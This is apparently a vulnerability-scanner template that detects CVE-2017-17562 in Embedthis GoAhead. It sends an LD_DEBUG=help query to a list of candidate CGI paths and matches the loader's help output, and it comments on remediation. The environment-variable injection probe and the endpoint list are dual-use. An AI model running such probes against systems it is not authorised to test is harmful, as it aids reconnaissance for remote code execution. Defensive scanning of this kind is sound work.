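# Detection template for CVE-2017-17562 (Embedthis GoAhead, fixed in 3.6.5).
#
# For each candidate CGI name below, the template sends
#   GET /cgi-bin/<endpoint>?LD_DEBUG=help
# and reports a finding when the response is a 200 whose body contains the
# dynamic loader's LD_DEBUG help text. That text can only appear if the query
# parameter was copied into the environment of a dynamically linked CGI
# process, which is the condition the CVE describes. The probe only asks the
# loader to print its help output.
#
# Remediation for a positive result: upgrade GoAhead to 3.6.5 or later. Per the
# description, the issue needs CGI to be enabled and the CGI program to be
# dynamically linked, so disabling unused CGI handlers removes the exposure.
id: CVE-2017-17562

info:
  name: Embedthis GoAhead RCE
  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  author: geeknik
  reference: |
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
  severity: high
  tags: cve,cve2017,rce,embedthis,goahead,fuzz

requests:
  - payloads:
      # Candidate CGI program names tried under /cgi-bin/. A host is only
      # detectable if one of these exists on it, so a clean result does not
      # prove the device is patched - confirm the GoAhead version as well.
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome

    raw:
      - |
        GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Accept: */*
        Connection: close

    # One request per endpoint value.
    attack: sniper

    # One matching endpoint is enough to confirm the host. Stopping there keeps
    # the remaining candidate requests off what is usually a small embedded web
    # server and yields a single finding per host.
    stop-at-first-match: true

    # Both matchers must hold: a 200 alone is common for catch-all handlers,
    # and the help text alone could be served with an error status.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Both phrases come from the loader's LD_DEBUG=help output; requiring
      # both avoids matching pages that merely mention environment variables.
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and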